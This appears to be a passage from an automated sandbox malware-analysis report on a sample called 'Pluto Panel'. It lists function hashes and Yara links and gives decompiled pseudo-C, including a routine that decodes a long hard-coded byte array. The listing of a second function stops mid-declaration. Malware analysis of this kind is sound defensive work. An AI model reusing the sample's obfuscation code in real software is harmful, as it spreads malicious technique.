                                                                                                          Function 032076A8 Relevance: .1, Instructions: 86COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dc3ddb2f54e9f2eb1c7c9032be8f2f902febcb6b1357a651c845350fe3b2e203
                                                                                                          • Instruction ID: 666494e195807418999d897ee97890a888436555b3342ce3d8d9123148d8f7a1
                                                                                                          • Opcode Fuzzy Hash: dc3ddb2f54e9f2eb1c7c9032be8f2f902febcb6b1357a651c845350fe3b2e203
                                                                                                          • Instruction Fuzzy Hash: 1C310270E012199FDB08DFA8D850AEEBBF2EB88300F10852AD514B7390DB756E42CF95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032019A0 Relevance: .1, Instructions: 68COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a74e9c2b9d72f36d1f4c8af4334d67641e2956236ecf385dc778bb6a185280fd
                                                                                                          • Instruction ID: bad3e207a741101a9b5379e8a2608b635a19c0d0d496b6caf9ef1cb71b1687b4
                                                                                                          • Opcode Fuzzy Hash: a74e9c2b9d72f36d1f4c8af4334d67641e2956236ecf385dc778bb6a185280fd
                                                                                                          • Instruction Fuzzy Hash: 9A21057490120ADFCB04EFA8C944BEEBBB2BF45301F1485A9D404B73A5DB349B85DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032019B0 Relevance: .1, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7749348a1aa2f541cb687cffdcd86d5bf59d6e5fa4be45c39c776cd439a586a8
                                                                                                          • Instruction ID: c3b7e1f31b438025e2b33de8713a6b407c0f3b555cc861e883e4c49ed84842ef
                                                                                                          • Opcode Fuzzy Hash: 7749348a1aa2f541cb687cffdcd86d5bf59d6e5fa4be45c39c776cd439a586a8
                                                                                                          • Instruction Fuzzy Hash: 1121F33490120ADFCB04EFA8C444AEEB7B2BF45301F2485A9D40577395DB74AA84DBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0320482F Relevance: .1, Instructions: 57COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a6958b139d1236fdd99acff4026695819e00b27f9d733f6771ed970e4f3d6c56
                                                                                                          • Instruction ID: 6d78668c29cdc67cd70855f925780fe738f0e462067ce9f08824597ded621992
                                                                                                          • Opcode Fuzzy Hash: a6958b139d1236fdd99acff4026695819e00b27f9d733f6771ed970e4f3d6c56
                                                                                                          • Instruction Fuzzy Hash: 6721F274E09219DFDB00EFA0D9587EEBBF0AB09300F2085A9D501B7291D7789A88CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03206711 Relevance: .0, Instructions: 23COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b38762de321b614179584bee045247e6964e96efc6fd717f38e30e0f0022af1b
                                                                                                          • Instruction ID: 30ef363cb475f1aa3df9374749add8e8df39418837b9346b36630be9bc777f67
                                                                                                          • Opcode Fuzzy Hash: b38762de321b614179584bee045247e6964e96efc6fd717f38e30e0f0022af1b
                                                                                                          • Instruction Fuzzy Hash: E2D05B35E592188ACB60EF54E8445FDF3B0EB47214F1131D2D55CB3122DB31DE988E15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032094AC Relevance: .0, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f06e45582b58af10ad791ba334579a571d100a3f92f98b2df9eef72d36bed15b
                                                                                                          • Instruction ID: 52e9748d454b2ca04531ab7e6568a552e9ba1608269dc53c4dec79a799ab93f2
                                                                                                          • Opcode Fuzzy Hash: f06e45582b58af10ad791ba334579a571d100a3f92f98b2df9eef72d36bed15b
                                                                                                          • Instruction Fuzzy Hash: E7D0EC35E295188BCB24EF54EC405FCF374FB46215F012492E509A3121D7328A884A55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03209596 Relevance: .0, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a48a44bc784b880bcedfbd07b6445703d3fc8ea1243b4b49f1088b6f247ac1de
                                                                                                          • Instruction ID: c6d40a79faf534dbebededa4b69e266cc70f60cd1135fa6000bfc6c673423a50
                                                                                                          • Opcode Fuzzy Hash: a48a44bc784b880bcedfbd07b6445703d3fc8ea1243b4b49f1088b6f247ac1de
                                                                                                          • Instruction Fuzzy Hash: A3D01275E2A0188BCB60EF94F8405FCF7B4EB46214F1170D2D50DB7251D731AB844E55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03205CCE Relevance: .0, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 08d668e0a5e85df04b884305b9675efb977a524052507e2d738640c1de9d5496
                                                                                                          • Instruction ID: 940201f53b8828fba810ba1be495ef2d3a93258e5e283aab80308a7db0ec1086
                                                                                                          • Opcode Fuzzy Hash: 08d668e0a5e85df04b884305b9675efb977a524052507e2d738640c1de9d5496
                                                                                                          • Instruction Fuzzy Hash: 3BD0E235E591198BCB20EFA4EA406ECF3B0EB46214F1120A3D609B7141D6308A588B24
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03200728 Relevance: .0, Instructions: 12COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                          • Instruction ID: 1288d7e1c4a6f83d682a3586f0e2e5bb18e103b0ae555f566e4bbb3823f47889
                                                                                                          • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                          • Instruction Fuzzy Hash: 58B09236E540089AEB008EC8B4413FCF770E782229F106063C218B3591827586A84A89
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032017F8 Relevance: .0, Instructions: 12COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                          • Instruction ID: 8cfb8913528362ff856790899a0e5885f9b72a6247fca082299eb2110a95fbf0
                                                                                                          • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                          • Instruction Fuzzy Hash: C1B0923EE140089ADB008EC4B4413FCF7B4E786229F102063C218B3551837192A84689
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032014C0 Relevance: .0, Instructions: 12COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                          • Instruction ID: 984d52549c8fe561f2a306d4c9fa8175a4cf4af02cd195cb9384885e810b830a
                                                                                                          • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                          • Instruction Fuzzy Hash: 66B0923AE140089ADB008EC4B4813FCF770E782229F142163C219B3552827592A84689
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00F1B1E6 Relevance: 60.3, Strings: 48, Instructions: 282COMMON
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 75%
                                                                                                          			E00F1B1E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				char _v12;
				signed char* _v16;
				signed char* _v20;
				signed char* _v24;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				signed char* _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				signed char* _v284;
				char _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				signed int _v300;
				char _v320;
				void _v348;
				void* __ebx;
				void* __edi;
				void* _t178;
				void* _t180;
				void* _t182;
				signed char* _t184;
				intOrPtr _t219;
				signed int _t231;
				intOrPtr _t242;

				_t242 = __ecx;
				_push(0x44356c);
				_v292 = __ecx;
				_a4 = _a4 + 4;
				_t178 = E00F2105D(_a4 + 4);
				_push(_t178);
				L00F5B581();
				_t219 = _a8;
				if(_t178 == 0) {
					E00F21069(E00F2105D(_t219 + 4) | 0xffffffff, __ecx + 0x2c, _t216);
				}
				_push(0x44357c);
				_t180 = E00F2105D(_a4);
				_push(_t180);
				L00F5B581();
				if(_t180 == 0) {
					E00F21069(E00F2105D(_t219 + 4) | 0xffffffff, _t242 + 0x40, _t212);
				}
				_push(0x443588);
				_t182 = E00F2105D(_a4);
				_push(_t182);
				L00F5B581();
				if(_t182 == 0) {
					E00F21069(E00F2105D(_t219 + 4) | 0xffffffff, _t242 + 0x54, _t208);
				}
				_push(0x443598);
				_t184 = E00F2105D(_a4);
				_push(_t184);
				L00F5B581();
				if(_t184 != 0) {
					L13:
					return _t184;
				} else {
					_v24 = _t184;
					_v16 = _t184;
					_v20 = _t184;
					_v280 = 0x1d;
					_v279 = 0xac;
					_v278 = 0xa8;
					_v277 = 0xf8;
					_v276 = 0xd3;
					_v275 = 0xb8;
					_v274 = 0x48;
					_v273 = 0x3e;
					_v272 = 0x48;
					_v271 = 0x7d;
					_v270 = 0x3e;
					_v269 = 0xa;
					_v268 = 0x62;
					_v267 = 7;
					_v266 = 0xdd;
					_v265 = 0x26;
					_v264 = 0xe6;
					_v263 = 0x67;
					_v262 = 0x81;
					_v261 = 3;
					_v260 = 0xe7;
					_v259 = 0xb2;
					_v258 = 0x13;
					_v257 = 0xa5;
					_v256 = 0xb0;
					_v255 = 0x79;
					_v254 = 0xee;
					_v253 = 0x4f;
					_v252 = 0xf;
					_v251 = 0x41;
					_v250 = 0x15;
					_v249 = 0xed;
					_v248 = 0x7b;
					_v247 = 0x14;
					_v246 = 0x8c;
					_v245 = 0xe5;
					_v244 = 0x4b;
					_v243 = 0x46;
					_v242 = 0xd;
					_v241 = 0xc1;
					_v240 = 0x8e;
					_v239 = 0xfe;
					_v238 = 0xd6;
					_v237 = 0xe7;
					_v236 = 0x27;
					_v235 = 0x75;
					_v234 = 6;
					_v233 = 0x8b;
					_v232 = 0x49;
					_v231 = _t184;
					_v230 = 0xdc;
					_v229 = 0xf;
					_v228 = 0x30;
					_v227 = 0xa0;
					_v226 = 0x9e;
					_v225 = 0xfd;
					_v224 = 9;
					_v223 = 0x85;
					_v222 = 0xf1;
					_v221 = 0xc8;
					_v220 = 0xaa;
					_v219 = 0x75;
					_v218 = 0xc1;
					_v217 = 8;
					_v216 = 5;
					_v215 = 0x79;
					_v214 = 1;
					_v213 = 0xe2;
					_v212 = 0x97;
					_v211 = 0xd8;
					_v210 = 0xaf;
					_v209 = 0x80;
					_v208 = 0x38;
					_v207 = 0x60;
					_v206 = 0xb;
					_v205 = 0x71;
					_v204 = 0xe;
					_v203 = 0x68;
					_push(0x80);
					_push(_t184);
					_push( &_v152);
					_v202 = 0x53;
					_v201 = 0x77;
					_v200 = 0x2f;
					_v199 = 0xf;
					_v198 = 0x61;
					_v197 = 0xf6;
					_v196 = 0x1d;
					_v195 = 0x8e;
					_v194 = 0x8f;
					_v193 = 0x5c;
					_v192 = 0xb2;
					_v191 = 0x3d;
					_v190 = 0x21;
					_v189 = 0x74;
					_v188 = 0x40;
					_v187 = 0x4b;
					_v186 = 0xb5;
					_v185 = 6;
					_v184 = 0x6e;
					_v183 = 0xab;
					_v182 = 0x7a;
					_v181 = 0xbd;
					_v180 = 0x8b;
					_v179 = 0xa9;
					_v178 = 0x7e;
					_v177 = 0x32;
					_v176 = 0x8f;
					_v175 = 0x6e;
					_v174 = 6;
					_v173 = 0x24;
					_v172 = 0xd9;
					_v171 = 0x29;
					_v170 = 0xa4;
					_v169 = 0xa5;
					_v168 = 0xbe;
					_v167 = 0x26;
					_v166 = 0x23;
					_v165 = 0xfd;
					_v164 = 0xee;
					_v163 = 0xf1;
					_v162 = 0x4c;
					_v161 = 0xf;
					_v160 = 0x74;
					_v159 = 0x5e;
					_v158 = 0x58;
					_v157 = 0xfb;
					_v156 = 0x91;
					_v155 = 0x74;
					_v154 = 0xef;
					_v153 = 0x91;
					L00F5B531();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t231 = 7;
					_push(0x11);
					asm("movsb");
					_push( &_v320);
					_push( &_v152);
					memcpy( &_v348, 0x4435b8, _t231 << 2);
					L00F5B575();
					_v8 =  &_v280;
					_v296 =  *((intOrPtr*)(_t219 + 0x18));
					_v12 = 0x90;
					_v300 =  *(_t219 + 2) & 0x0000ffff;
					if(E00F1C860( &_v24,  &_v300,  &_v12, 0,  &_v288) != 0) {
						L9:
						_t184 = _v284;
						if(_t184 != 0) {
							E00F2118A(_v292 + 0x68,  &(_t184[4]),  *_t184 & 0x000000ff, 0);
							_t184 =  *0x4430d8(_v284);
						}
						L11:
						if(_v24 == 0) {
							goto L13;
						}
						return  *0x443100(_v24);
					}
					_push(0x1c);
					_push( &_v348);
					_push( &_v152);
					L00F5B575();
					_v8 =  &_v280;
					_v12 = 0x9b;
					_t184 = E00F1C860( &_v24,  &_v300,  &_v12, 0,  &_v288);
					if(_t184 == 0) {
						goto L11;
					}
					goto L9;
				}
			}

























































































































































                                                                                                          0x00f1b1f8
                                                                                                          0x00f1b1fa
                                                                                                          0x00f1b1ff
                                                                                                          0x00f1b205
                                                                                                          0x00f1b208
                                                                                                          0x00f1b20d
                                                                                                          0x00f1b20e
                                                                                                          0x00f1b215
                                                                                                          0x00f1b21a
                                                                                                          0x00f1b22b
                                                                                                          0x00f1b22b
                                                                                                          0x00f1b233
                                                                                                          0x00f1b238
                                                                                                          0x00f1b23d
                                                                                                          0x00f1b23e
                                                                                                          0x00f1b247
                                                                                                          0x00f1b258
                                                                                                          0x00f1b258
                                                                                                          0x00f1b260
                                                                                                          0x00f1b265
                                                                                                          0x00f1b26a
                                                                                                          0x00f1b26b
                                                                                                          0x00f1b274
                                                                                                          0x00f1b285
                                                                                                          0x00f1b285
                                                                                                          0x00f1b28d
                                                                                                          0x00f1b292
                                                                                                          0x00f1b297
                                                                                                          0x00f1b298
                                                                                                          0x00f1b2a1
                                                                                                          0x00f1b744
                                                                                                          0x00f1b744
                                                                                                          0x00f1b2a7
                                                                                                          0x00f1b2a7
                                                                                                          0x00f1b2aa
                                                                                                          0x00f1b2ad
                                                                                                          0x00f1b2b0
                                                                                                          0x00f1b2b7
                                                                                                          0x00f1b2be
                                                                                                          0x00f1b2c5
                                                                                                          0x00f1b2cc
                                                                                                          0x00f1b2d3
                                                                                                          0x00f1b2da
                                                                                                          0x00f1b2e1
                                                                                                          0x00f1b2e8
                                                                                                          0x00f1b2ef
                                                                                                          0x00f1b2f6
                                                                                                          0x00f1b2fd
                                                                                                          0x00f1b304
                                                                                                          0x00f1b30b
                                                                                                          0x00f1b312
                                                                                                          0x00f1b319
                                                                                                          0x00f1b320
                                                                                                          0x00f1b327
                                                                                                          0x00f1b32e
                                                                                                          0x00f1b335
                                                                                                          0x00f1b33c
                                                                                                          0x00f1b343
                                                                                                          0x00f1b34a
                                                                                                          0x00f1b351
                                                                                                          0x00f1b358
                                                                                                          0x00f1b35f
                                                                                                          0x00f1b366
                                                                                                          0x00f1b36d
                                                                                                          0x00f1b374
                                                                                                          0x00f1b37b
                                                                                                          0x00f1b382
                                                                                                          0x00f1b389
                                                                                                          0x00f1b390
                                                                                                          0x00f1b397
                                                                                                          0x00f1b39e
                                                                                                          0x00f1b3a5
                                                                                                          0x00f1b3ac
                                                                                                          0x00f1b3b3
                                                                                                          0x00f1b3ba
                                                                                                          0x00f1b3c1
                                                                                                          0x00f1b3c8
                                                                                                          0x00f1b3cf
                                                                                                          0x00f1b3d6
                                                                                                          0x00f1b3dd
                                                                                                          0x00f1b3e4
                                                                                                          0x00f1b3eb
                                                                                                          0x00f1b3f2
                                                                                                          0x00f1b3f9
                                                                                                          0x00f1b400
                                                                                                          0x00f1b407
                                                                                                          0x00f1b40d
                                                                                                          0x00f1b414
                                                                                                          0x00f1b41b
                                                                                                          0x00f1b422
                                                                                                          0x00f1b429
                                                                                                          0x00f1b430
                                                                                                          0x00f1b437
                                                                                                          0x00f1b43e
                                                                                                          0x00f1b445
                                                                                                          0x00f1b44c
                                                                                                          0x00f1b453
                                                                                                          0x00f1b45a
                                                                                                          0x00f1b461
                                                                                                          0x00f1b468
                                                                                                          0x00f1b46f
                                                                                                          0x00f1b476
                                                                                                          0x00f1b47d
                                                                                                          0x00f1b484
                                                                                                          0x00f1b48b
                                                                                                          0x00f1b492
                                                                                                          0x00f1b499
                                                                                                          0x00f1b4a0
                                                                                                          0x00f1b4a7
                                                                                                          0x00f1b4ae
                                                                                                          0x00f1b4b5
                                                                                                          0x00f1b4bc
                                                                                                          0x00f1b4c3
                                                                                                          0x00f1b4ca
                                                                                                          0x00f1b4d1
                                                                                                          0x00f1b4d6
                                                                                                          0x00f1b4dd
                                                                                                          0x00f1b4de
                                                                                                          0x00f1b4e5
                                                                                                          0x00f1b4ec
                                                                                                          0x00f1b4f3
                                                                                                          0x00f1b4fa
                                                                                                          0x00f1b501
                                                                                                          0x00f1b508
                                                                                                          0x00f1b50f
                                                                                                          0x00f1b516
                                                                                                          0x00f1b51d
                                                                                                          0x00f1b524
                                                                                                          0x00f1b52b
                                                                                                          0x00f1b532
                                                                                                          0x00f1b539
                                                                                                          0x00f1b540
                                                                                                          0x00f1b547
                                                                                                          0x00f1b54e
                                                                                                          0x00f1b555
                                                                                                          0x00f1b55c
                                                                                                          0x00f1b563
                                                                                                          0x00f1b56a
                                                                                                          0x00f1b571
                                                                                                          0x00f1b578
                                                                                                          0x00f1b57f
                                                                                                          0x00f1b586
                                                                                                          0x00f1b58d
                                                                                                          0x00f1b594
                                                                                                          0x00f1b59b
                                                                                                          0x00f1b5a2
                                                                                                          0x00f1b5a9
                                                                                                          0x00f1b5b0
                                                                                                          0x00f1b5b7
                                                                                                          0x00f1b5be
                                                                                                          0x00f1b5c5
                                                                                                          0x00f1b5cc
                                                                                                          0x00f1b5d3
                                                                                                          0x00f1b5da
                                                                                                          0x00f1b5e1
                                                                                                          0x00f1b5e8
                                                                                                          0x00f1b5ef
                                                                                                          0x00f1b5f6
                                                                                                          0x00f1b5fd
                                                                                                          0x00f1b604
                                                                                                          0x00f1b60b
                                                                                                          0x00f1b612
                                                                                                          0x00f1b619
                                                                                                          0x00f1b620
                                                                                                          0x00f1b627
                                                                                                          0x00f1b62e
                                                                                                          0x00f1b635
                                                                                                          0x00f1b63c
                                                                                                          0x00f1b64c
                                                                                                          0x00f1b64d
                                                                                                          0x00f1b64e
                                                                                                          0x00f1b651
                                                                                                          0x00f1b652
                                                                                                          0x00f1b653
                                                                                                          0x00f1b65b
                                                                                                          0x00f1b65c
                                                                                                          0x00f1b66e
                                                                                                          0x00f1b66f
                                                                                                          0x00f1b671
                                                                                                          0x00f1b67c
                                                                                                          0x00f1b682
                                                                                                          0x00f1b68f
                                                                                                          0x00f1b696
                                                                                                          0x00f1b6bb
                                                                                                          0x00f1b704
                                                                                                          0x00f1b704
                                                                                                          0x00f1b70c
                                                                                                          0x00f1b720
                                                                                                          0x00f1b72b
                                                                                                          0x00f1b72b
                                                                                                          0x00f1b731
                                                                                                          0x00f1b735
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f1b73a
                                                                                                          0x00f1b6bd
                                                                                                          0x00f1b6c5
                                                                                                          0x00f1b6cc
                                                                                                          0x00f1b6cd
                                                                                                          0x00f1b6db
                                                                                                          0x00f1b6f4
                                                                                                          0x00f1b6fb
                                                                                                          0x00f1b702
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f1b702

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                          • API String ID: 0-140969752
                                                                                                          • Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                                          • Instruction ID: 0eb65e239be903c880f93dd7af2ebc0ca04ff590ace53d4ba6b4b3a30fe977bf
                                                                                                          • Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                                          • Instruction Fuzzy Hash: 8BF1FE209087E9C9DB32C7788C097CDBE645B27324F0843D9E1E87A2D2D7B54BC59B66
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00F7E67A Relevance: 57.8, Strings: 46, Instructions: 307COMMON
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 80%
                                                                                                          			E00F7E67A(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v76;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
